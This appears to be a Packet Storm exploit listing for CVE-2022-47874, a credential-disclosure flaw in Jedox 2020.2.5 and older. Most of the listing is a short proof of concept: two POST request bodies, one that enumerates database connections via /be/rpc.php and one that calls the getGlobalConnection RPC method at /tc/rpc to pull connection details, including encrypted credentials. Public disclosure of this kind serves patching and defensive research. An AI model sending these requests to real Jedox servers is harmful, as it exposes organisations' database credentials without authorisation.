Jedox 2020.2.5 Database Credential Disclosure

2023-05-0500:00:00

Christoph Mahrl, Patrick Pirker, Michael Wedl, Aron Molnar

packetstormsecurity.com

176

jedox 2020.2.5

database credential disclosure

improper access controls

remote authenticated users

view details

exploit vulnerability

cve-2022-47874

java rpc function

encrypted credentials

0.023 Low

EPSS

Percentile

89.7%

JSON

`# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls  
# Date: 28/04/2023  
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL  
# Vendor Homepage: https://jedox.com  
# Version: Jedox 2020.2 (20.2.5) and older  
# CVE : CVE-2022-47874  
  
  
Introduction  
=================  
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.  
  
  
Write-Up  
=================  
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.  
  
  
Proof of Concept  
=================  
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):  
  
PATH: /be/rpc.php  
METHOD: POST  
BODY:  
[  
[  
"conn",  
"ls",  
[  
null,  
false,  
true,  
[  
"type",  
"active",  
"description"  
]  
]  
]  
]  
  
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:  
  
PATH: /tc/rpc  
METHOD: POST  
BODY:  
[  
[  
"com.jedox.etl.mngr.Connections",  
"getGlobalConnection",  
[  
"<CONNECTION>"  
]  
]  
]  
  
`

0.023 Low

EPSS

Percentile

89.7%

JSON

Related for PACKETSTORM:172156